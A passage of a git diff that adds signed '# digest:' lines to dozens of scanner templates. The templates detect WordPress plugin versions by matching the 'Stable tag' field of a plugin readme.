newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..240909e631 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a939c88ba1e9a347e7d8a049834bb356c8f569fe79e94c75279c42ed508f0559022100918ff436fe0d196e4c6f6a3f4e31d9db5553581e53d9d3027fa472de0ea644a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..91e9c9285b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220730b1789b8bd16491734aa90960459d30012aee0b9357813affcaafc8f95f3230220444b70a3675d41ce67a4d8a2d9675b370ff4ee91b3eb520452e796b3b91c4d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..c8ef0a3a34 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220160426c2c45ed3dd1f1c93b3f2e3dffdb9b51ad5703d3307606bb796b371b87f022100a20f2f72755f8e798b0c04e917eed35b450c651f4b4eb5f469a4ab77278edcf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..1dfbe22b8e 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220106bfe859d72994afbe2e20e3bf4d34906b6a9e732241c2d7b98402519d4d8ce02206bd78279dd1f4a1345d3aa72ce62ed1fbf60d9da5ad1ea68116bf414143b0774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5685dd5f08..d31b0e21a7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096869ef72e4e8342c365c1f56a562e125a49898055c8ee82a50d3b11d85f08d10221008e7508c9ff3c50d27e7159aed6926939a19bf37cb7b1e2dc06e2d473f8b78b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..3c1418a122 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081c3150012c167c3441566acba30bfd9f484d5899015f4ac14f2f4a66062a200022100d45a28b6d4380d3229878310b8f1360f55b8846259f01fafb537aa37470bc2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..158a8368ab 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220018651f3296114235c1f3affc9871e4234638b98a9f6c4ce12ed69ee0a76bf260220183fa9859058bfe0e99dacc4bdfc9a21c817fdbd486dc890147e1d2e36c4ef8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..8051a34eb0 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3ebab3cc9b524f931cf50294756f466d272d18180ddce763f7a39549e29547a022100b7a846dfdd0e3c1e753587d4f0522b198286a33127556a4ce3545a20c0386662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..1286cacaa5 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3e83021ba85c2ab290ed6a76741302ec8e951c47c68ca726dca6e73d57557b202203cae9173eb2710498391f48338debb7167053dd380d561982b295803185693c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index effba09471..219541eedd 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202340d3ceea17cfd82a9c98c01d839731e4cf470ed2feef02eca7483e99ba918202207a6e6c104a98a2708e25963b38667ea01b41c2777db6f7961de4e5d33e2a0707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 37153b7ae5..1c4b9d93ab 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019cc21cf43060c6dee359fe4be4332ae89c2c84fb2997eb8bec617a60d79a06e022072113511edba2b824949e660f0c5f089aed7a8a9140c833c026384e8d456a6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..b24d40de68 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0a7e9b674a45aff5b332424f53d5968f0c99fd80a1fd514b4ffcfcce90215b3022100cfdcec7debe77d1d6ee843254efd9e33ff0e2d560891f1bf12c377d800940eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..15055faa5f 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e90dd6f5ca59da74dfaf7ffab05bf80b2a551cab232371b824af8a23f9a4232022100c5b26ddea82600a81d8cc68db28c28624380d5a403b08acc5ac17abf31dc58dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3462f5ea6b..6244f4db27 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcff2265e50ced04dc4b4e64257a5875394fb25029ff13a3c3982b6b88e2649502204ef149d852cb71a1fcb05fc6b2b8b11b2f84cf2c74f096f10500570a14454e56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5c9ae8bc4f..3806d20ee7 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c77e74bbbfbd9d13a7dde2aea5651ed9657db9000ebf2192b7d61598e4ac248202205e356b37e5b8f917bc0d4c548b45bb6792e91a675ac601e85e060afdf18941a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..0addf8435b 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202cdb909514ee2a686fb64925bcbcf213f9cca392c718131ef5af9c5f05ed85e8022100b56dd7da0ff353bad1e5f521c89f97b892782f273544c2edf9e8ecdf54fa3ae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..943090f1da 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220363785409ca87c3fc580bfb0dd9ce193ad8d888e8d883fce20bb8203967330ac0220675c0d57b0b52e7212bd9b3cf45125b022e5a5e1dd414d9a9bda86c9729cde49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..a4e0d747a4 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009076a9e9c75fff49800a240ce14ff66c3f918585da9d71c46bc2d6f189c9d084022100f0fbd01562529c1dc297d8060be4842c8cf763dc7fdfea384aaf1e74cb45d0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..bcea7146d9 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e4f1e237d0ecb176c074d4dffc0a744ae88b794f709dd3bb9c4e3de9c2a0576022100ee9f17a24ae07e1d70ad94fceac8d103a5670008d2b577d797a7d4b181b0952e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..14d0e37eec 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088d6b42ec98fcfffa4ea1a3c690d0c2b10b4ec29e54a78086dfd151de945c2b3022100b0a0fc90c9f30162f05b1ac30043a4b8353fcbc438adeeae9fc62d8b65a50e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 6ff90e0902..f40b967481 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100923e22f3adab9b62fb58e6afe846098614b0f0bde9f71941535a3de2497d0065022100f34b5172885bb480db944dcc5363320ff176c7e306d79934a06fddf35b9f628f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..1c65e28081 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb8380e641e18b6450ae1c789c691c6339f918aab0bcf5d684506f53fcf60601022100e84617c797f0df43ce9bd9d09f4acbeb4d50c7455c6e84d1c4217de7a53c42c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..36c9a5859a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051b54ab3a58c3de52a42e1fa1ac08d6ed146df4a339210701e549b41437aba9d02207536020b20627d7621fa9aa5d0a9fbbf16679b1626c4e03c6094d5d09be9567e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 27e45e39ca..dbb90090fa 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0bd289b3ec122c620a771e3d34f10e55086c3ecfd42343512a2f74dc4af0a690220319e5e9deec78beae53b9f496c6e88ed6307c08d54854b9d329f93437e3a03ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..563f2d3b82 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210096b62ccab25b7a939bb2090e66c7257e5c501f9da561f9f71a8d182b187ad5230220295254f32a58fb2726e1e5207d7d461efa50412dfccbb5cfdac847c31c3e9438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index d679d8df61..59d4d61a61 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100904f3613745949fd411bec0d4feb35a4ff155549439da30ac78f62a54acd3857022100e1816838352813e02edbf1cc2025e8e730f56ccafb67f13b7c31e2c709aea624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 8bfe16ca84..e2381f01ec 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe12906c15fbfd2e76f61bcca5b6d1b846299f6c5e943ac9a2a0a46905c658630220061aac020bf045786add67947e1474bf0b9d0d83680132c0ac9d0b21b74837b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..e058e3be90 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f9eea75b3d1348625aef5c40d7cf0e0c67ecd93dc7b8fa8e59836814d10cb89022100ad56b283f8493fc95b8716db7c19a7ff03e2c30d731e03cce4f13cb57ffa5b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..28aa5e4da3 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe185b766ff1d37450ed38311c10bc6d1ad1703965706a4846e778daa468753402203f0623426efbac93cd7c54da6c1d03b6f32f2e3b7aeb00a9f32ebd16a6258cdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..888835b2fb 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee3b737a4dca59cb7cfc524660666bc31d40e2cc543c43471ce446066db81ad8022036161c0f5804e9f191403e8acaf89960d0808fef7c8c5d33987bc34f1985677e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..9470a9d9d1 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b58f032a7b12567654ae94dbed2e3b0133400760a936649c11c5482cbeb05360221008380c39ffb7de9c3c91955e2bfd9013de8cde571629ccfe680c8764c07d1b9a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 67968fb008..d6556495ef 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2fe104027eb1e6e0a06d1f225b6538cf86e3b894398feaaacdd5854dc03dfd10221009c111351dbde61399b8938aa240f1e9a26f79dee8c449c67a76cd1bdf9bf9c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..80e3e0ecfe 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022041e873a814464415828d27d39600502f062b7df49e1fb9c018415aedf63602d00221009d2199e3e2b5b70172fda5d41ae292c2c1490b6899f436dd193e9b7355ba2b3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..185c9576b4 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100af438fde20ef5815133165016297bf4359b705c01738b7913293bafe1fd476380220088cd425382f18b1b49381d74f62692f25290b0a09add6f080a7808d7f061ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..aca973133c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e10378e1f49ec6ed9fb1db563b507518756aa32812e1ae4fe3beb38e0476e8f022100d097efbe7797045eff57e4ec8c9751ada5f485e9cdaa1d70fde0f9458e5c4bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d22f60a5cd..1ef62b3eef 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022056fb14711010e5c2fc5e92619e7b79bfd111ce60864209b894ff4c53d6f96e8802205d177397c34e5d13fa4ee19653eecb7d0879b5c645d11553681452e2f5ff6b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..1d8ef66f52 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084a5b1f4bc681ddce0a3ac0da79d438c14a6e6a72bccb2e14ad6fddc584bc4d1022100f507cb656edd8ba7f39504b5c672f8cb897e756bda3fd6759534039010f69e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 2d4f463d97..0ebae8be19 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009df65f639f621b22181e5539c76822a6c8fb5e206b501862fc482a71bd6bb3e102203676db9040bdf89e9eec76dd65958f69b47fe8898cb81fae7cde7fa89ba4e7e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index cb67671918..3f6279dbe4 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe8f3b63551736990510de563ad07ced4aaaddd5fc247cbf9247963cc15dc983022054729b557d44f6d912e79bf25f81aefe3de5a0d24d587c662fa01014a2dfae99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cc3eb2481a..cbab72debc 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054bb0fcfb24342b1b38c861c6d13cbcb6aeb691fb6c9daf3cb62140c396e6cee022100bbb0d6c443be6cbfc5c4d1d87069ce0ca82de729d0ca774882acd555fb33ae73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..987960c178 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220788004cc9abdd3d3d19ee8cc23b615c2023760686be151a2bed1257bd7e9506b022100e6e2de8bff27b2bb64439da5ef5809b5d896819d3a633ec33a9f21b9a7e2062f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..eb5888becf 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022cf9042b5d0a3659f32a1c383e3407f3d11da7f10d1f953ec5b383fa9d1bff00221008ec0e530e86475ec9dc9a055e2d700c8e4e70d8baf186f12deeccc2f9df3ef2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..17a9b09d47 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220615ba9944c333fdd90efe5ec26a846b4a3f42fde41807af18cb9fe71d8b394fc0221009512fcd8632d70a54889ca1a1dbd878e9350bff82e8e0ebce637bf55ef018b3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a33aa7964f..1d134302a4 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058f9ba32f42ca9b8a6a5a30f8bd0f98f3559318327922973b5026cc07c999aa9022100d5a2ced263c5f8d960337fb5813db94d4c739906c6fa89ef411c64d974bb819f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..5bce277c69 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7de37cbd4290d2b5059ad47ad4c139f71325b99540fd2b90aad6dd5fa42935602205650a286debf963c55df9ba337272cb279abe0283e3fd2bbda0a55438bcd31dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..68eadde6a0 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ffc863df2c11224ea4ef2b7d7169b9f4ee24522701db5df98e470d8a99f74731022100d55bc174045b9d98b87eb41be87cd817e371e0fa9f45284aea0e76071ca8891f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..8b434a9cca 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f44162d1d5e52bc86a3f3ab3157b1773fac7c6872837a46cc0f3a643e980f050022100bd5f888f8c2ceb2d5644598d8125a80d2d64a8285fac1cb354f47d88b574ea96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..fc5afd55c1 100644 --- 